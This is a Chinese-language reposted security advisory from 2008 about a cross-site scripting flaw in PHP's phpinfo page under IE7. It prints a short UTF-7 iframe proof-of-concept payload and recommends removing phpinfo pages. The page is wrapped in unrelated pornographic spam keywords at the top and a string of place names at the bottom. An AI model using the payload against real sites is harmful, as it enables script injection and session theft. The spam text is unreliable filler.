最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

phpinfo跨站腳本漏洞

互聯(lián)網(wǎng)   發(fā)布時(shí)間:2008-10-08 20:02:06   作者:佚名   我要評論
漏洞說明: php是一款被廣泛使用的編程語言,可以被嵌套在html里用做web程序開發(fā)。phpinfo()是用來顯示當(dāng)前php環(huán)境的一個(gè)函數(shù),許多站點(diǎn)和程序都會將phpinfo放在自己的站點(diǎn)上或者在程序里顯示,但是phpinfo里存在一些安全問題,導(dǎo)致精心構(gòu)造數(shù)據(jù)就可以產(chǎn)生一個(gè)跨站腳
漏洞說明:

php是一款被廣泛使用的編程語言,可以被嵌套在html里用做web程序開發(fā)。phpinfo()是用來顯示當(dāng)前php環(huán)境的一個(gè)函數(shù),許多站點(diǎn)和程序都會將phpinfo放在自己的站點(diǎn)上或者在程序里顯示,但是phpinfo里存在一些安全問題,導(dǎo)致精心構(gòu)造數(shù)據(jù)就可以產(chǎn)生一個(gè)跨站腳本漏洞,可以被用來進(jìn)行攻擊。

漏洞成因: phpinfo頁面對輸入的參數(shù)都做了詳細(xì)的過濾,但是沒有對輸出的進(jìn)行charset的指定,而在一些瀏覽器里如IE7里,你可以讓它自動選擇編碼或者通過一個(gè)iframe頁面給它指定編碼,這樣就可以饒過phpinfo的過濾而產(chǎn)生一個(gè)跨站腳本漏洞。

漏洞來源: http://www.80sec.com/release/phpinfo-xss.txt

漏洞利用: 利用代碼如下:

<html>
<head>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</head>
<body>
<iframe src="http://www.80sec.com/phpinfo.php? ADw-SCRIPT AD4-alert(document.domain); ADw-/SCRIPT AD4-=1">

以上代碼在IE7 php 5.2.6測試成功。phpinfo頁面的xss甚至比其他頁面更加危險(xiǎn),因?yàn)槿绻衟hpinfo的存在,惡意攻擊者可以利用phpinfo的輸出bypass如httponly和一些基礎(chǔ)認(rèn)證。

漏洞影響: 影響所有版本的php和瀏覽器IE7
漏洞修補(bǔ): 建議暫時(shí)刪除站點(diǎn)的phpinfo頁面避免被人利用。

相關(guān)文章

最新評論

绵阳市| 承德县| 沐川县| 原平市| 肇源县| 福清市| 兴隆县| 普兰县| 兴仁县| 寿宁县| 井陉县| 金川县| 石台县| 江北区| 甘孜县| 西林县| 阿坝| 始兴县| 东乌| 岳池县| 扶绥县| 东乌珠穆沁旗| 南靖县| 佛坪县| 望谟县| 射洪县| 罗江县| 晋州市| 运城市| 海盐县| 湘阴县| 镇江市| 邯郸县| 盐源县| 铜梁县| 吴忠市| 开江县| 金山区| 香格里拉县| 乳山市| 东至县|